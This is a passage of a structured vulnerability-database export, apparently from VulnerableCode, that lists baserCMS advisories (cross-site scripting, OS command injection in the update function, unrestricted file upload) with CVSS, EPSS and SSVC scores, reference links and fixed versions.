scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/
url https://basercms.net/security/JVN_09767360
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/
url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-51450
reference_id CVE-2023-51450
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-51450
5
reference_url https://github.com/advisories/GHSA-77fc-4cv5-hmfr
reference_id GHSA-77fc-4cv5-hmfr
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-77fc-4cv5-hmfr
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-77fc-4cv5-hmfr
reference_id GHSA-77fc-4cv5-hmfr
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-77fc-4cv5-hmfr
fixed_packages
0
url pkg:composer/baserproject/basercms@5.0.9
purl pkg:composer/baserproject/basercms@5.0.9
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9
aliases CVE-2023-51450, GHSA-77fc-4cv5-hmfr
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-uedz-j2vn-cbea
27
url VCID-xpsb-2yux-g3cf
vulnerability_id VCID-xpsb-2yux-g3cf
summary 
Cross-site Scripting
Improper neutralization of JavaScript input in the blog article editing function of baserCMS allows remote authenticated attackers to inject an arbitrary script via unspecified vectors.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-20683
reference_id
reference_type
scores
0
value 0.00203
scoring_system epss
scoring_elements 0.42402
published_at 2026-06-05T12:55:00Z
1
value 0.00203
scoring_system epss
scoring_elements 0.42327
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-20683
1
reference_url https://basercms.net/security/JVN64869876
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN64869876
2
reference_url https://github.com/baserproject/basercms/commit/88ccc61e5656b05dd13204d61de706efaa2cd0b1
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/88ccc61e5656b05dd13204d61de706efaa2cd0b1
3
reference_url https://jvn.jp/en/jp/JVN64869876/index.html
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://jvn.jp/en/jp/JVN64869876/index.html
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-20683
reference_id CVE-2021-20683
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-20683
fixed_packages
0
url pkg:composer/baserproject/basercms@4.4.5
purl pkg:composer/baserproject/basercms@4.4.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-5ay3-1t5g-vycu
3
vulnerability VCID-7x3n-4c2b-nfbx
4
vulnerability VCID-891u-x525-ykbb
5
vulnerability VCID-8buz-nsr9-3yge
6
vulnerability VCID-8ssu-umet-37bk
7
vulnerability VCID-ays7-6wvh-augt
8
vulnerability VCID-d1sf-cmct-zbh1
9
vulnerability VCID-g56w-z9cx-5ygv
10
vulnerability VCID-ggv8-3v9t-mfea
11
vulnerability VCID-hpk4-a6tr-3ffe
12
vulnerability VCID-j37y-gws9-ake9
13
vulnerability VCID-jby7-s5ez-dqb3
14
vulnerability VCID-k575-suuf-7bhf
15
vulnerability VCID-k5qv-4yp3-zbgf
16
vulnerability VCID-khft-xvrw-g3dr
17
vulnerability VCID-kmpp-6j49-pqfz
18
vulnerability VCID-mfm9-gsh3-ubg8
19
vulnerability VCID-nxrf-64er-xbfx
20
vulnerability VCID-p695-t9ye-v3ga
21
vulnerability VCID-pd8c-9d7z-zkhg
22
vulnerability VCID-sqr4-v889-tff8
23
vulnerability VCID-u16w-rbuk-ybfs
24
vulnerability VCID-uedz-j2vn-cbea
25
vulnerability VCID-y2sz-c6vb-pkdp
26
vulnerability VCID-zqd4-rdem-jfgk
27
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.5
aliases CVE-2021-20683, GHSA-v9w8-hq92-v39m
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-xpsb-2yux-g3cf
28
url VCID-y2sz-c6vb-pkdp
vulnerability_id VCID-y2sz-c6vb-pkdp
summary 
baserCMS Update Functionality Vulnerable to OS Command Injection
### Summary
The latest version of baserCMS (basercms-5.2.2) contains an OS command injection vulnerability (CWE-78) in its update functionality.
Due to this issue, an authenticated user with administrator privileges in baserCMS can execute arbitrary OS commands on the server with the privileges of the user account running baserCMS.

### Details
Please refer to the attached materials.
[OSコマンドインジェクション(baserCMSのアップデート機能).pdf](https://github.com/user-attachments/files/25468689/OS.baserCMS.pdf)



### Impact
An authenticated user with administrator privileges in baserCMS can execute OS commands on the server with the privileges of the user account running baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30877
reference_id
reference_type
scores
0
value 0.00063
scoring_system epss
scoring_elements 0.19955
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30877
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30877
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30877
6
reference_url https://github.com/advisories/GHSA-m9g7-rgfc-jcm7
reference_id GHSA-m9g7-rgfc-jcm7
reference_type
scores
url https://github.com/advisories/GHSA-m9g7-rgfc-jcm7
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30877, GHSA-m9g7-rgfc-jcm7
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-y2sz-c6vb-pkdp
29
url VCID-zqd4-rdem-jfgk
vulnerability_id VCID-zqd4-rdem-jfgk
summary 
baserCMS has a cross-site scripting vulnerability in blog posts.

### Target
baserCMS 5.2.1 and earlier versions

### Vulnerability

Malicious Javascript may be executed in blog posts.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page to reference for more information.
https://basercms.net/security/JVN_20837860

### Credits

Gai Tanaka@Mitsui Bussan Secure Directions, Inc.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30879
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01615
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30879
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30879
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30879
6
reference_url https://github.com/advisories/GHSA-jmq3-x8q7-j9qm
reference_id GHSA-jmq3-x8q7-j9qm
reference_type
scores
url https://github.com/advisories/GHSA-jmq3-x8q7-j9qm
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30879, GHSA-jmq3-x8q7-j9qm
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zqd4-rdem-jfgk
30
url VCID-zsgc-fnen-b7a6
vulnerability_id VCID-zsgc-fnen-b7a6
summary 
Unrestricted Upload of File with Dangerous Type
baserCMS is a Content Management system. Prior to version 4.7.5, any file may be uploaded on the management system of baserCMS. Version 4.7.5 contains a patch.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-25655
reference_id
reference_type
scores
0
value 0.00561
scoring_system epss
scoring_elements 0.68669
published_at 2026-06-04T12:55:00Z
1
value 0.00561
scoring_system epss
scoring_elements 0.6871
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-25655
1
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
2
reference_url https://github.com/baserproject/basercms/commit/922025a98b0e697ab78f6a785a004e0729aa9100
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/
url https://github.com/baserproject/basercms/commit/922025a98b0e697ab78f6a785a004e0729aa9100
3
reference_url https://github.com/baserproject/basercms/commit/9297629983ed908c7f51bf61a0231dde91404ebd
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/
url https://github.com/baserproject/basercms/commit/9297629983ed908c7f51bf61a0231dde91404ebd
4
reference_url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/
url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-25655
reference_id CVE-2023-25655
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-25655
6
reference_url https://github.com/advisories/GHSA-mfvg-qwcw-qvc8
reference_id GHSA-mfvg-qwcw-qvc8
reference_type
scores
url https://github.com/advisories/GHSA-mfvg-qwcw-qvc8
7
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-mfvg-qwcw-qvc8
reference_id GHSA-mfvg-qwcw-qvc8
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-mfvg-qwcw-qvc8
fixed_packages
0
url pkg:composer/baserproject/basercms@4.7.5
purl pkg:composer/baserproject/basercms@4.7.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-g56w-z9cx-5ygv
7
vulnerability VCID-ggv8-3v9t-mfea
8
vulnerability VCID-jby7-s5ez-dqb3
9
vulnerability VCID-k5qv-4yp3-zbgf
10
vulnerability VCID-khft-xvrw-g3dr
11
vulnerability VCID-mfm9-gsh3-ubg8
12
vulnerability VCID-nxrf-64er-xbfx
13
vulnerability VCID-p695-t9ye-v3ga
14
vulnerability VCID-pd8c-9d7z-zkhg
15
vulnerability VCID-sqr4-v889-tff8
16
vulnerability VCID-u16w-rbuk-ybfs
17
vulnerability VCID-uedz-j2vn-cbea
18
vulnerability VCID-y2sz-c6vb-pkdp
19
vulnerability VCID-zqd4-rdem-jfgk
20
vulnerability VCID-zxns-tzw3-27fr
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.5
aliases CVE-2023-25655, GHSA-mfvg-qwcw-qvc8
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zsgc-fnen-b7a6
Fixing_vulnerabilities
Risk_score4.0
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.3